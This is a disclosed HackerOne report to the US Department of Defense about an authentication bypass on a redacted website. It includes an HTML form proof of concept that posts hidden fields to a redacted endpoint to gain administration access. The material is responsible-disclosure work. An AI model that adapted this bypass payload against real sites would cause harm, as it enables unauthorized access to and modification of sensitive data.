Administration Authentication Bypass on https://█████

Disclosed: 2021-04-20 19:34:47 By fiveguyslover To deptofdefense
Critical
Vulnerability Details
Hi there I found a way to connect to an administration space on your website https://██████████ #how to reproduce ? 1) - go to this link : https://███/██████████ 2) - create a html file with : ```html <form action="https://████████/██████████" method="post"> <input type="hidden" name="█████" value=""> <input type="hidden" name="█████" value="1"> <input type="submit"> </form> ``` 3) - launch the file, click on the button and return to the page https://███████/█████ 4) - refresh the page and you have access to the administration POC : ██████████ if you need more information, contact me best regards, fiveguyslover ## Impact access to sensitive data and the ability to modify information. ## System Host(s) █████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce 1) - go to this link : https://█████/███████ 2) - create a html file with : ```html <form action="https://█████/███" method="post"> <input type="hidden" name="███" value=""> <input type="hidden" name="████" value="1"> <input type="submit"> </form> ``` 3) - launch the file, click on the button and return to the page https://██████/█████ 4) - refresh the page and you have access to the administration ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1146600
  • State: Closed
  • Substate: resolved
  • Upvotes: 13
Share this report